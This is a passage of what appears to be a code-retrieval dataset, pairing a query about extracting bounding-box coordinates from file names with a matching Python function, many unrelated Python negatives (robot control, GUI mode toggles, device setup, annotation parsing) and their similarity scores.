self.change_operating_mode(self._reg.MODE_EXT_POSI)\n # set to max velocity\n self.change_veloity(self._default_velocity)", "def on_show_view(self):\n self.setup()", "def on_show_view(self):\n self.setup()", "def on_show_view(self):\n self.setup()", "def mannequin_mode(self, event=None):\n if not self._mannequin_mode:\n self.set_action_status_message('mannequin_mode', 'requested')\n subprocess.Popen(['rosrun', 'pr2_controller_manager', \n 'pr2_controller_manager', 'stop', 'GPSPR2Plugin'], stdout=DEVNULL)\n self._mm_process = subprocess.Popen(['roslaunch',\n 'pr2_mannequin_mode', 'pr2_mannequin_mode.launch'], stdout=DEVNULL)\n self._mannequin_mode = True\n self.set_action_status_message('mannequin_mode', 'completed',\n message='mannequin mode toggled on')\n else:\n self.set_action_status_message('mannequin_mode', 'requested')\n self._mm_process.send_signal(signal.SIGINT)\n subprocess.Popen(['rosrun', 'pr2_controller_manager',\n 'pr2_controller_manager', 'start', 'GPSPR2Plugin'], stdout=DEVNULL)\n self._mannequin_mode = False\n self.set_action_status_message('mannequin_mode', 'completed',\n message='mannequin mode toggled off')", "def onStartAssistModeToggled(self, checked):\r\n # productive\r\n profprint()\r\n if checked:\r\n self.fiducialObturatorButton.checked = 0\r\n self.fiducialButton.checked = 0\r\n self.fiducialButton.text = \"2. 
Start Giving Needle Tips [CTRL + ENTER]\"\r\n self.start(self.addCTLPoints)\r\n self.startAssistModeButton.text = \"Stop Assisted Manual Segmentation\"\r\n else:\r\n self.stop()\r\n self.startAssistModeButton.text = \"Start Assisted Manual Segmentation\"", "def main(ctx):\n\n print(\"Mode:\")", "def start_game(self):\n\n\t\tpass", "def main():\n setup()\n master = Master()\n master.start()", "def main(themes):\n # Get toggled mode based on current system mode.\n toggled_mode = get_toggled_mode(get_current_mode())\n print('\\nSetting themes...')\n\n for theme in themes:\n # Set toggled mode.\n theme.mode = toggled_mode\n theme.toggle_callback(theme)\n if IS_WINDOWS:\n print(f'Setting system theme to: {toggled_mode.name}')\n toggle_mode(toggled_mode)\n print()", "def init(cls):\n\n cls.configs = yaml.load( file('../local/config.yaml') )\n cls.is_online = False\n cls.state = State.playing\n cls.classes = classes\n cls.guiclasses = guiclasses\n\n # set up pygame and init\n pygame.init()\n\n # Set up the window\n cls.screen = pygame.display.set_mode(\n tuple(cls.configs['options']['resolution']),\n 0,\n 32)\n classes.screen = cls.screen\n guiclasses.screen = cls.screen", "def start(self):\n self.delegate.start_preview(fullscreen=False, window = (350, 10, self.size[0] - 350, self.size[1] - 10))", "def setup():\n print('Setup option is not working')\n quit()\n print('Long press the reset button until the blue Led is blinking quickly')\n print('Long press again until blinking slowly')\n print('Manually connect this device to the Wifi SSID named BlroadlinkProv')\n print('Press security mode (0 = none, 1 = WEP, 2 = WPA1, 3 = WPA2, 4 = WPA1/2)')\n print('Default:3')\n\n security = raw_input('Security mode:').lower()\n\n if security == 'none':\n security = 0\n elif security == 'wep':\n security = 1\n elif security == 'wpa1':\n security = 2\n elif (security == 'wpa2') or (security == ''):\n security = 3\n elif security == 'wpa1/2':\n security = 4\n security = int(security)\n if not(0 <= security <= 4):\n raise IndexError\n\n ssid = raw_input('SSID of your router :')\n if security != 0:\n password = raw_input('Password:')\n else:\n password = ''\n broadlink.setup(ssid, password, security)", "def __init__(self, settings, **kwargs):\n super(MainScreen, self).__init__(**kwargs)\n Clock.schedule_interval(self.update_status_fields, 1*CLOCK_SPEED)\n self.settings = settings\n self.ml_interface.debug = self.debug\n self.ml_interface.mer_ip_address = self.settings[\"ip_address\"]\n self.ml_interface.software_version = str(self.settings[\"software_version\"])\n self.ml_interface.software_title = self.settings[\"title\"]\n self.ml_interface.speed = str(self.settings[\"speed\"])\n self.ml_interface.speed_out = str(self.settings[\"speed_out\"])\n self.standby_position = str(\n self.settings[\"standby_position\"]\n )\n self.requested_position = str(\n self.settings[\"default_requested_position\"]\n )\n self.ml_interface.standby_position = self.standby_position\n self.ml_interface.requested_position = self.requested_position\n self.title = self.ml_interface.software_title\n self.settingsWindow = SettingsWindow(ml_object=self.ml_interface, main_screen = self)\n self.infoWindow = InfoWindow(ml_object=self.ml_interface)\n self.testWindow = TestWindow(self, ml_interface=self.ml_interface)\n if not self.debug:\n self.ml_interface.initialize_poll_connection_thread()\n self.read_thread = threading.Thread(target=self.ml_interface.initialize_read_thread)\n self.read_thread.start()\n self.ml_interface.update_ml()\n 
self.ml_interface.write()\n self.set_requested_position()\n self.set_standby_position()", "def modes(self, mode):\n # Sends the update to the piston worker\n self.worker_piston.mode = mode\n if mode == 1: # 'VCV'\n self.VCV_start_btn.setEnabled(False)\n self.PCV_start_btn.setEnabled(True)\n self.PSV_start_btn.setEnabled(True)\n self.stop_btn.setEnabled(True)\n elif mode == 2: # 'PCV'\n self.VCV_start_btn.setEnabled(True)\n self.PCV_start_btn.setEnabled(False)\n self.PSV_start_btn.setEnabled(True)\n self.stop_btn.setEnabled(True)\n elif mode == 3: # 'PSV'\n self.VCV_start_btn.setEnabled(True)\n self.PCV_start_btn.setEnabled(True)\n self.PSV_start_btn.setEnabled(False)\n self.stop_btn.setEnabled(True)\n elif mode == 4: # 'Emergency'\n print('Emergency')\n self.VCV_start_btn.setEnabled(True)\n self.PCV_start_btn.setEnabled(True)\n self.PSV_start_btn.setEnabled(True)\n self.stop_btn.setEnabled(False)\n else: # STOP\n self.VCV_start_btn.setEnabled(True)\n self.PCV_start_btn.setEnabled(True)\n self.PSV_start_btn.setEnabled(True)\n self.stop_btn.setEnabled(False)", "def start(cls):\n\n cls._set_mode_running()\n TimeDisplay.start_time()\n for callback in cls.start_callback:\n callback()", "def _startup_system(self):\n\n self._config_path.set(filedialog.asksaveasfilename())\n self._system = System(self._config_path.get())\n\n self._start_frame.pack_forget()\n self._main_frame.pack()", "def set_test_mode(self):\n self._test_mode = True\n self._wins = 0\n self._draws = 0\n self._count = 0\n self._losses = 0" ]
[ "0.6800144", "0.6734263", "0.66898155", "0.66412646", "0.6498546", "0.633072", "0.62841946", "0.6278032", "0.6212285", "0.6206775", "0.62048006", "0.6197723", "0.61908454", "0.6190276", "0.6158729", "0.6156555", "0.61511356", "0.6121974", "0.6118286", "0.6098591", "0.6072834", "0.60583925", "0.60570484", "0.6044386", "0.60377973", "0.60302305", "0.5998851", "0.59982586", "0.5993802", "0.5980473", "0.5972917", "0.5919762", "0.5915006", "0.5911113", "0.5907258", "0.59056765", "0.58958644", "0.5858373", "0.58548194", "0.5852927", "0.58470994", "0.5842645", "0.5828466", "0.58149594", "0.58076674", "0.5804036", "0.5793941", "0.57900834", "0.5786133", "0.57733387", "0.57718873", "0.5771126", "0.5767558", "0.57515067", "0.5750067", "0.5745488", "0.5741431", "0.5728327", "0.57190937", "0.5718519", "0.57145035", "0.5698967", "0.56905955", "0.56874883", "0.56841224", "0.56668645", "0.5662075", "0.56568015", "0.5656511", "0.56528825", "0.5651482", "0.5645521", "0.56423265", "0.5638522", "0.563299", "0.5631248", "0.5620125", "0.5614731", "0.5614488", "0.5613203", "0.56124675", "0.5611486", "0.5611457", "0.5609385", "0.5609385", "0.5609385", "0.56065285", "0.56063527", "0.5601845", "0.5601631", "0.55996025", "0.55949533", "0.5592701", "0.5592468", "0.5584581", "0.5576966", "0.55750054", "0.55738735", "0.557348", "0.55678236" ]
0.7203417
0
Extract bbox info from file name.
def get_bbox(fname):
    fname = fname.split('_')  # fname -> list
    i = fname.index('bbox')
    return map(float, fname[i+1:i+5])  # m
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_bbox(fname):\r\n fname = fname.split('_') # fname -> list\r\n i = fname.index('bbox')\r\n return list(map(float, fname[i+1:i+5])) # m\r", "def get_bbox(fname):\r\n\r\n fname = fname.split('_') # fname -> list\r\n i = fname.index('bbox')\r\n return list(map(float, fname[i+1:i+5])) # m\r", "def bbox(self, filename: str) -> str:\n temp = \"/tmp/\" + os.path.basename(filename)\n im = cv2.imread(filename)\n # Draw rectangle for on-screen debugging.\n match = re.search(r\"l(\\d+)_r(\\d+)_t(\\d+)_b(\\d+)_w(\\d+)_h(\\d+)\", filename)\n l = int(match.group(1))\n r = int(match.group(2))\n t = int(match.group(3))\n b = int(match.group(4))\n w = int(match.group(5))\n h = int(match.group(6))\n assert w == r - l\n assert h == b - t\n cv2.rectangle(im, (l, t), (r, b), BLUE, 3)\n cv2.imwrite(temp, im)\n return temp", "def format_bbox_file(self, img_name, data):\r\n\r\n with open(self.bboxes_local, 'w+') as fbbox:\r\n # remove path\r\n bboxes = data.split(' ')[1:]\r\n for i in range(0, len(bboxes), 4):\r\n cur_bbox = bboxes[i:i+4]\r\n fbbox.write(img_name + ' ' + ' '.join(cur_bbox) + '\\n')", "def get_bbox_data(self):\r\n with open(self.bboxes_local, 'r') as fbbox:\r\n data = fbbox.read()\r\n\r\n return data", "def test_get_bounding_box(self):\n\n # Note there are two possible correct values of bbox depending on\n # the version of gdal:\n # http://trac.osgeo.org/gdal/wiki/rfc33_gtiff_pixelispoint\n\n # Get gdal version number\n x = gdal.VersionInfo('').replace('dev', '').split()\n y = x[1].split('.')[:2]\n z = ''.join(y) # Turn into number and\n if z.endswith(','):\n z = z[:-1] # Remove trailing comma\n\n # Reference bbox for vector data\n ref_bbox = {'tsunami_building_exposure.shp': [150.15238387897742,\n -35.71084183517241,\n 150.18779267086208,\n -35.70131768155173]}\n\n # Select correct reference bbox for rasters\n if float(z) < 17:\n ref_bbox['Earthquake_Ground_Shaking_clip.tif'] = [99.3641696,\n -2.2031806,\n 102.2411696,\n -0.0041806]\n else:\n ref_bbox['Earthquake_Ground_Shaking_clip.tif'] = [99.36,\n -2.199,\n 102.237,\n 0.0]\n\n for filename in ['Earthquake_Ground_Shaking_clip.tif',\n 'tsunami_building_exposure.shp']:\n abspath = os.path.join(TESTDATA, filename)\n bbox = get_bounding_box(abspath)\n msg = ('Got bbox %s from filename %s, but expected %s '\n % (str(bbox), filename, str(ref_bbox[filename])))\n assert numpy.allclose(bbox, ref_bbox[filename]), msg\n\n # Check the conversions\n bbox_string = bboxlist2string(bbox)\n\n # Check the check :-)\n check_bbox_string(bbox_string)\n\n # Check that it works for layer objects instantiated from file\n L = read_layer(abspath)\n L_bbox = L.get_bounding_box()\n msg = ('Got bbox %s from filename %s, but expected %s '\n % (str(L_bbox), filename, str(ref_bbox[filename])))\n assert numpy.allclose(L_bbox, ref_bbox[filename]), msg\n\n # Check that it works for layer objects instantiated from data\n if L.is_raster:\n D = Raster(data=L.get_data(),\n projection=L.get_projection(),\n geotransform=L.get_geotransform())\n elif L.is_vector:\n D = Vector(data=L.get_data(),\n projection=L.get_projection(),\n geometry=L.get_geometry())\n else:\n msg = 'Unexpected layer object: %s' % str(L)\n raise RuntimeError(msg)\n\n # Check that get_bounding_box works for data instantiated layers\n D_bbox = D.get_bounding_box()\n msg = ('Got bbox %s from layer %s, but expected %s '\n % (str(D_bbox), str(D), str(L_bbox)))\n assert numpy.allclose(D_bbox, L_bbox), msg", "def _populate_bbox_data(self, filename: str) -> None:\n if self.box_images.get(filename) is None:\n 
return []\n\n target = self.parse_voc_xml(ET_parse(self.box_targets[filename]).getroot())\n\n # TO-DO\n # The following function can also be used to output pose for each bbox\n bbox = self.get_objects(target)\n\n return bbox", "def bbox_from_json(bbox_file):\n with open(bbox_file, 'r') as f:\n bbox = np.array(json.load(f)['bbox']).astype(np.float32)\n ul_corner = bbox[:2]\n center = ul_corner + 0.5 * bbox[2:]\n width = max(bbox[2], bbox[3])\n scale = width / 200.0\n # make sure the bounding box is rectangular\n return center, scale", "def bbox_from_json(bbox_file):\n with open(bbox_file, 'r') as f:\n bbox = np.array(json.load(f)['bbox']).astype(np.float32)\n ul_corner = bbox[:2]\n center = ul_corner + 0.5 * bbox[2:]\n width = max(bbox[2], bbox[3])\n scale = width / 200.0\n # make sure the bounding box is rectangular\n return center, scale", "def load_bbox(depth_dir, view):\n base_filename = os.path.join(depth_dir, \"%05d\" % view)\n if os.path.exists(base_filename + \".npz\"):\n npz_dict = np.load(base_filename + \".npz\")\n if 'bbox' in npz_dict:\n crop = npz_dict['bbox']\n else:\n crop = None\n else:\n crop = None\n if crop is None:\n crop_files = glob(base_filename + \"_bbox*\")\n if len(crop_files) == 1:\n crop = np.load(crop_files[0])\n elif len(crop_files) > 1:\n error(\"Crop file base '%s_bbox' matches multiple files\" % base_filename)\n return crop", "def read_bounding_boxes(filename):\n f = open(filename)\n objects = []\n weight = 0\n height = 0\n for line in f:\n print(line)\n first_word = line.split(';')[0]\n if first_word == \"Dimensions\":\n weight = line.split(';')[1]\n height = line.split(';')[2]\n if first_word == \"Object\":\n objects.append((line.split(';')[1], line.split(';')[2], line.split(';')[4],\n line.split(';')[5], line.split(';')[6], line.split(';')[7]))\n return weight, height, objects", "def getBoundingBox(filepath):\n datasource = ogr.Open(filepath)\n geo_dict = {}\n\n for layer in datasource:\n layer_name = layer.GetDescription()\n ext = layer.GetExtent()\n bbox = [ext[0], ext[2], ext[1], ext[3]]\n\n try:\n spatial_ref = layer.GetSpatialRef()\n spatial_ref.AutoIdentifyEPSG()\n crs = spatial_ref.GetAuthorityCode(None)\n except Exception as e:\n logger.debug(\"Error extracting EPSG CODE from layer {}: \\n {}\".format(layer_name, e))\n crs = None\n\n # Patch GDAL > 3.2 for GML https://github.com/OSGeo/gdal/issues/2195\n if int(osgeo.__version__[0]) >= 3 and int(osgeo.__version__[2]) < 2 and datasource.GetDriver().GetName() ==\"GML\":\n bbox = [ext[2], ext[0], ext[3], ext[1]]\n\n geo_dict[layer_name] = {\"bbox\": bbox, \"crs\": crs}\n\n if bbox == null_island or crs is None:\n logger.debug(\"Layer {} does not have identifiable geographic extent. 
CRS may be missing.\".format(layer_name))\n del geo_dict[layer_name][\"crs\"]\n\n bbox_merge = hf.bbox_merge(geo_dict, filepath)\n\n spatial_extent = None\n\n if bbox_merge is not None:\n if len(bbox_merge) != 0:\n spatial_extent = bbox_merge\n\n return spatial_extent", "def load_bb(filename):\n in_data = gdal.Open(filename, 0)\n geotransform = in_data.GetGeoTransform()\n nx = in_data.RasterXSize\n ny = in_data.RasterYSize\n return geotransform2bb(geotransform, nx, ny)", "def get_annotation_by_name(ImgName, df, default_size = (640,640)):\n ImgName = ImgName.split('.')[0] + '.jpg'\n bb_boxes = df[df['Frame'] == ImgName].reset_index()\n labels = np.zeros(len(bb_boxes))\n bbox = np.zeros((len(bb_boxes), 4))\n for i in range(len(bb_boxes)):\n #resize bbox to default size\n labels[i] = bb_boxes.iloc[i]['label']\n bbox[i,0] = bb_boxes.iloc[i]['center_x']\n bbox[i,1] = bb_boxes.iloc[i]['center_y']\n bbox[i,2] = bb_boxes.iloc[i]['w']\n bbox[i,3] = bb_boxes.iloc[i]['h']\n #print(bbox)\n #print(len(bb_boxes))\n return labels, bbox", "def getBoundingBox(fileList):\n return IrgGeoFunctions.getImageBoundingBox(fileList[0])", "def layer_bbox(m, names, proj_target, bbox=None):\n for layer in (l for l in m.layers if l.name in names):\n # it may as well be a GPX layer in WGS84\n layer_proj = mapnik.Projection(layer.srs)\n box_trans = mapnik.ProjTransform(layer_proj, proj_target)\n lbbox = box_trans.forward(layer.envelope())\n if bbox:\n bbox.expand_to_include(lbbox)\n else:\n bbox = lbbox\n return bbox", "def find_bbox(pred_file_path: str, train_file_path: str) -> Dict:\n\n f_pred = open(pred_file_path, \"r\")\n pred_result = f_pred.readlines()\n f_pred.close()\n\n img_index = get_img_index(pred_result)\n\n img_names = get_image_names(train_file_path)\n\n if len(img_index) - 1 != len(img_names):\n return \"There is mismatch between the number of predictions and the number of images.\"\n\n # Create dictionary with the img name as the key and the bbox information as values.\n target_labels = [\"TableCaption\", \"TableBody\", \"TableFootnote\", \"Paragraph\", \"Table\"]\n result = {}\n for i, name in enumerate(img_names):\n key = name\n start = img_index[i] + 1\n end = img_index[i + 1]\n unfiltered_value = pred_result[start:end]\n filtered_value = [\n v for v in unfiltered_value if v.split(\":\")[0] in target_labels\n ]\n result[key] = filtered_value\n\n return result", "def read_mesh_nodes_bbox(filename):\n nodes = read_mesh_nodes(filename)\n bbox = read_mesh_bbox(nodes=nodes)\n return nodes, bbox", "def get_bbox(im_file, visualize=False):\n im = cv2.imread(im_file)\n non_black_pixels = im.any(axis=-1).nonzero() \n bbox = [min(non_black_pixels[1][:]), min(non_black_pixels[0][:]),\n max(non_black_pixels[1][:]), max(non_black_pixels[0][:])]\n if visualize:\n vis_bbox(im, bbox)\n plt.show()\n return bbox", "def parseBoundaryField(fn):\n content = getFileContent(fn)\n if content is not None:\n return parseBoundaryContent(content)\n else:\n return None", "def geoBoundsMetadata(filename,format=\"shapefile\"):\n if format==\"shapefile\":\n with fiona.open(filename, 'r') as c:\n bnd= c.bounds\n bnd=(bnd[0],bnd[2],bnd[3],bnd[1])\n return \"ENVELOPE{0}\".format(bnd)\n\n else:\n with rasterio.open(filename,'r') as c:\n bnd= c.bounds\n bnd=(bnd[0],bnd[2],bnd[3],bnd[1])\n return \"ENVELOPE{0}\".format(bnd)", "def read_annotation_yolov5(bbox_path):\n\n # image_paths = get_lists_in_dir(rawImage_dir)\n\n dw = 1./(camera_resolution[0]) # 1 / image width\n dh = 1./(camera_resolution[1]) # 1 / image height\n\n # Read in bbox 
coordinate information from bbox_information.txt\n dimension_list = []\n with open(bbox_path, 'r') as annotation_file:\n content = annotation_file.read().splitlines()\n\n for n in content:\n # x = int(n.split()[0])+int(n.split()[2])/2\n # y = int(n.split()[1])+int(n.split()[3])/2\n # w = int(n.split()[2])\n # h = int(n.split()[3])\n #\n # x = x*dw\n # w = w*dw\n # y = y*dh\n # h = h*dh\n\n bb = n.split()\n w = int(bb[2])\n h = int(bb[3])\n\n start_x = int(bb[0])\n start_y = int(bb[1])\n\n center_x = start_x + w / 2\n center_y = start_y + h / 2\n\n x = center_x * dw\n y = center_y * dh\n w = w * dw\n h = h * dh\n \n dimension_list.append((x, y, w, h))\n\n return dimension_list", "def bbox_img(img, bbox):\n if len(bbox) == 4:\n return img[bbox[1]:bbox[3], bbox[0]:bbox[2]]\n else:\n return img", "def getbbox(self):\n pass", "def bbox_coordinates(label_sitk):\n\n #Setting Bounding Box\n F_statistics = sitk.LabelShapeStatisticsImageFilter()\n\n F_statistics.Execute(label_sitk)\n bbox_dims = F_statistics.GetBoundingBox(1)\n\n spacer = 3\n xmin = bbox_dims[0]-spacer\n xmax = bbox_dims[1]+spacer\n ymin = bbox_dims[2]-spacer\n ymax = bbox_dims[3]+spacer\n zmin = bbox_dims[4]-spacer\n zmax = bbox_dims[5]+spacer\n\n p1 = [xmin-spacer, ymin, zmin]\n p2 = [xmin, ymin, zmax]\n p3 = [xmin, ymax, zmin]\n p4 = [xmin, ymax, zmax]\n p5 = [xmax, ymin, zmin]\n p6 = [xmax, ymin, zmax]\n p7 = [xmax, ymax, zmin]\n p8 = [xmax, ymax, zmax]\n bbox_pts = [p1, p2, p3, p4, p5, p6, p7, p8]\n\n return bbox_pts", "def load_annotations(path, img_w, img_h):\n bboxes = []\n with open(path, 'r') as file:\n for row in file:\n _, xc , yc, w, h = row.split()\n xc = float(xc)*img_w\n yc = float(yc)*img_h\n w = float(w)*img_w\n h = float(h)*img_h\n bboxes.append([xc - w/2 , yc - h/2, xc + w/2 , yc + h/2])\n\n return bboxes", "def process_image_bbox(image, bbox, labels, file_name):\n bounds, classes, scores = postprocessing(bbox, image)\n image_processed = annotate(image, bounds, classes, scores, labels)\n image_processed.save(file_name, 'png')\n return image_processed", "def get_bboxes(self, image_path: str, img_pipeline=None):\n pass", "def bbox(self):\n return np.array(self.path.get_extents()).ravel(order='F')", "def get_bounding_box_from_xml_path(path: Path) -> np.ndarray:\n with open(path, mode=\"r\") as file:\n bs = BeautifulSoup(file, \"xml\")\n\n x_min = float(bs.bndbox.xmin.string)\n x_max = float(bs.bndbox.xmax.string)\n y_min = float(bs.bndbox.ymin.string)\n y_max = float(bs.bndbox.ymax.string)\n\n return np.array([x_min, y_min, x_max - x_min, y_max - y_min])", "def getBoundingBoxes():\n allBoundingBoxes = BoundingBoxes()\n import glob\n import os\n # Read ground truths\n pth = \"../Wildtrack_dataset/annotations_positions/*.json\"\n files = glob.glob(pth)\n files.sort()\n # Class representing bounding boxes (ground truths and detections)\n allBoundingBoxes = BoundingBoxes()\n # Read GT detections from txt files\n # Each value of each line is \"class_id, x, y, width, height\" respectively\n # Class_id represents the class of the bounding box\n # x, y represents the most top-left coordinates of the bounding box\n # x2, y2 represents the most bottom-right coordinates of the bounding box\n for idx, f in enumerate(files):\n with open(f) as j:\n data = json.load(j)\n # print(f)\n for d in data:\n for v in d['views']:\n if v['viewNum'] != 0 or v['xmax'] == -1:\n continue\n\n idClass = 'person' # class\n x = float(v['xmin']) # confidence\n y = float(v['ymin'])\n w = float(v['xmax'])\n h = float(v['ymax'])\n bb = BoundingBox(\n 
str(idx),\n idClass,\n x,\n y,\n w,\n h,\n CoordinatesType.Absolute, (1920, 1080),\n BBType.GroundTruth,\n format=BBFormat.XYX2Y2)\n allBoundingBoxes.addBoundingBox(bb)\n \n\n\n # Read detections\n with open(\"wildtrack_yolo_tiny.out\", \"rb\") as fin:\n pred = pickle.load(fin)\n for idx, (k, value) in enumerate(pred.items()):\n for d in value:\n if d['tag'] != \"person\":\n continue\n \n box = d['box']\n idClass = 'person' # class\n x = float(box[0]) # confidence\n y = float(box[1])\n w = float(box[2])\n h = float(box[3])\n bb = BoundingBox(\n str(idx),\n idClass,\n x,\n y,\n w,\n h,\n CoordinatesType.Absolute, (1920, 1080),\n BBType.Detected,\n d['score'],\n format=BBFormat.XYX2Y2)\n allBoundingBoxes.addBoundingBox(bb)\n return allBoundingBoxes", "def getBBox(self, detector_name):\n if not hasattr(self, '_bbox_cache'):\n self._bbox_cache = {}\n\n if detector_name not in self._bbox_cache:\n dm_bbox = self._camera[detector_name].getBBox()\n dm_min = dm_bbox.getMin()\n dm_max = dm_bbox.getMax()\n cam_bbox = geom.Box2I(minimum=geom.Point2I(dm_min[1], dm_min[0]),\n maximum=geom.Point2I(dm_max[1], dm_max[0]))\n\n self._bbox_cache[detector_name] = cam_bbox\n\n return self._bbox_cache[detector_name]", "def parse_filename(cls, filename):\n #from nose.tools import set_trace; set_trace()\n m = re.match(cls._pattern, os.path.basename(filename))\n basename = m.group(1)\n bandname = cls._bandmap.get(m.group(2), m.group(2))\n return basename, bandname", "def boundingbox_location_change(boundingbox, file_name, dir):\n root = dir\n jpgfile = file_name[0:-3]+'jpg'\n img = cv2.imread(root+jpgfile)\n shape = img.shape\n print (img.shape)\n print boundingbox\n new_boundingbox = []\n\n for b in boundingbox:\n axis = b.split(' ')\n x = float(axis[1])\n x = x * shape[0]\n y = float(axis[2])\n y = y*shape[1]\n width = float(axis[3])\n width = width * shape[0]\n heights = float(axis[4])\n heights = heights * shape[1]\n\n xmin = x - 0.5*width\n ymin = y - 0.5*heights\n xmax = x + 0.5*width\n ymax = y + 0.5*heights\n new_b = [int(xmin), int(ymin), int(xmax), int(ymax)]\n new_boundingbox.append(new_b)\n return new_boundingbox", "def getBoundingBoxesForFile(filepath,\n isGT,\n bbFormat,\n coordType,\n allBoundingBoxes=None,\n allClasses=None,\n imgSize=(0, 0),\n header=True):\n if allBoundingBoxes is None:\n allBoundingBoxes = BoundingBoxes()\n if allClasses is None:\n allClasses = []\n nameOfImage = filepath.replace(\".txt\", \"\")\n fh1 = open(filepath, \"r\")\n if header is True:\n header_line = fh1.readline()\n header_split = header_line.split(';')\n assert len(header_split) > 0\n height = header_split[0].split(':')[-1]\n width = header_split[1].split(':')[-1]\n if height is None or width is None:\n logger.warning(\"Height or width None!\")\n else:\n imgSize = (width, height)\n\n for line in fh1:\n line = line.replace(\"\\n\", \"\")\n if line.replace(' ', '') == '':\n continue\n\n splitLine = line.split(\" \")\n if isGT:\n # idClass = int(splitLine[0]) #class\n ann_id = int(splitLine[0])\n idClass = (splitLine[1]) # class\n x = float(splitLine[2])\n y = float(splitLine[3])\n w = float(splitLine[4])\n h = float(splitLine[5])\n bb = BoundingBox(\n nameOfImage,\n idClass,\n x,\n y,\n w,\n h,\n coordType,\n imgSize,\n BBType.GroundTruth,\n format=bbFormat,\n bbox_id=ann_id)\n else:\n # idClass = int(splitLine[0]) #class\n ann_id = int(splitLine[0])\n idClass = (splitLine[1]) # class\n confidence = float(splitLine[2])\n x = float(splitLine[3])\n y = float(splitLine[4])\n w = float(splitLine[5])\n h = 
float(splitLine[6])\n bb = BoundingBox(\n nameOfImage,\n idClass,\n x,\n y,\n w,\n h,\n coordType,\n imgSize,\n BBType.Detected,\n confidence,\n format=bbFormat,\n bbox_id=ann_id)\n allBoundingBoxes.addBoundingBox(bb)\n if idClass not in allClasses:\n allClasses.append(idClass)\n fh1.close()\n return allBoundingBoxes, allClasses", "def read_mesh_bbox(filename=None, nodes=None):\n if filename != None:\n nodes = read_mesh_nodes(filename)\n return np.array([[np.min(nodes[:,0]), np.min(nodes[:,1]), np.min(nodes[:,2])],\n [np.max(nodes[:,0]), np.max(nodes[:,1]), np.max(nodes[:,2])]])", "def fromFile(filepath, bbox=True, tbox=True, num_sample=None):\n logger.info(\"Extracting bbox={} tbox={} from file {}\".format(bbox, tbox, filepath))\n\n if not bbox and not tbox:\n logger.error(\"Require at least one of extraction options, but bbox is {} and tbox is {}\".format(bbox, tbox))\n raise Exception(\"No extraction options enabled!\")\n\n file_format = os.path.splitext(filepath)[1][1:]\n\n usedModule = None\n\n # initialization of later output dict\n metadata = {}\n\n # get the module that will be called (depending on the format of the file)\n\n for i in handle_modules:\n valid = handle_modules[i].checkFileSupported(filepath)\n if valid:\n usedModule = handle_modules[i]\n logger.info(\"{} is being used to inspect {} file\".format(usedModule.get_handler_name(), filepath))\n break\n\n # If file format is not supported\n if not usedModule:\n logger.info(\"Did not find a compatible module for file format {} of file {}\".format(file_format, filepath))\n return None\n\n # get Bbox, Temporal Extent, Vector representation and crs parallel with threads\n class thread(threading.Thread):\n def __init__(self, task):\n threading.Thread.__init__(self)\n self.task = task\n\n def run(self):\n\n metadata[\"format\"] = file_format\n metadata[\"geoextent_handler\"] = usedModule.get_handler_name()\n\n # with lock:\n\n logger.debug(\"Starting thread {} on file {}\".format(self.task, filepath))\n if self.task == \"bbox\":\n try:\n if bbox:\n spatial_extent = compute_bbox_wgs84(usedModule, filepath)\n if spatial_extent is not None:\n metadata[\"bbox\"] = spatial_extent['bbox']\n metadata[\"crs\"] = spatial_extent['crs']\n except Exception as e:\n logger.warning(\"Error for {} extracting bbox:\\n{}\".format(filepath, str(e)))\n elif self.task == \"tbox\":\n try:\n if tbox:\n if usedModule.get_handler_name() == 'handleCSV':\n extract_tbox = usedModule.getTemporalExtent(filepath, num_sample)\n else:\n if num_sample is not None:\n logger.warning(\"num_sample parameter is ignored, only applies to CSV files\")\n extract_tbox = usedModule.getTemporalExtent(filepath)\n if extract_tbox is not None:\n metadata[\"tbox\"] = extract_tbox\n except Exception as e:\n logger.warning(\"Error extracting tbox, time format not found \\n {}:\".format(str(e)))\n else:\n raise Exception(\"Unsupported thread task {}\".format(self.task))\n logger.debug(\"Completed thread {} on file {}\".format(self.task, filepath))\n\n thread_bbox_except = thread(\"bbox\")\n thread_temp_except = thread(\"tbox\")\n\n logger.debug(\"Starting 2 threads for extraction.\")\n\n thread_bbox_except.start()\n thread_temp_except.start()\n\n thread_bbox_except.join()\n thread_temp_except.join()\n\n logger.debug(\"Extraction finished: {}\".format(str(metadata)))\n\n return metadata", "def get_bbox(meta_data: List) -> List:\n\n x = [v for v in meta_data[0].split(\" \") if v][0]\n y = [v for v in meta_data[1].split(\" \") if v][0]\n w = [v for v in meta_data[2].split(\" \") if 
v][0]\n h = meta_data[3].replace(\")\", \"\").strip(\" \")\n\n return [x, y, w, h]", "def parse_bids_filename(filename: str) -> dict:\n parsed = {}\n results = list(re.search(bids_pattern, filename).groups())\n parsed[\"ext\"] = results.pop()\n while results:\n item = results.pop()\n if item is not None:\n parsed.update(_parse_segment(item))\n return parsed", "def bbox(self, idx):\n row = self.table.iloc[idx]\n bbox = row['bbox']\n return bbox", "def parse_bboxes(ann, classes):\n\n names, xmins, ymins, xmaxs, ymaxs = [], [], [], [], []\n ann_root = ann.getroot()\n\n for name in ann_root.iter('name'):\n names.append(np.float32(classes.index(name.text)))\n\n for xmin in ann_root.iter('xmin'):\n xmins.append(np.float32(xmin.text))\n\n for ymin in ann_root.iter('ymin'):\n ymins.append(np.float32(ymin.text))\n\n for xmax in ann_root.iter('xmax'):\n xmaxs.append(np.float32(xmax.text))\n\n for ymax in ann_root.iter('ymax'):\n ymaxs.append(np.float32(ymax.text))\n\n return np.column_stack((xmins, ymins, xmaxs, ymaxs, names))", "def extract_data(filename: str, directory: str) -> Dict:\n with open(filename) as f:\n lines = f.readlines()\n\n # Split data by :\n annotations = [line.replace(\" \", \"\").split(\":\") for line in lines]\n\n # Split data by ;\n for annotation in annotations:\n annotation[1] = annotation[1].split(\";\")\n\n # Loop for saving metadata into dictionary\n annot_dict = dict()\n for annotation in annotations:\n img = annotation[0]\n bbox_metadata = annotation[1]\n bbox = list()\n \n # Path to images\n img_path = os.path.join(directory, img)\n im = Image.open(img_path)\n width, height = im.size\n\n # Iterate over each bounding box\n for annot in bbox_metadata:\n \n if \"MISC_SIGNS\" == annot:\n signStatus = 'N/A'\n signTypes = \"MISC_SIGNS\"\n signPurpose = 'N/A'\n\n signBB = (-1, -1, -1, -1)\n signC = (-1, -1)\n signSize = 0\n aspectRatio = 0\n\n bbox.append({\"signStatus\": signStatus, \n \"signTypes\": signTypes, \n \"signPurpose\": signPurpose, \n \"signBB\": signBB, \n \"signC\": signC, \n \"signSize\": signSize, \n \"aspectRatio\": aspectRatio})\n 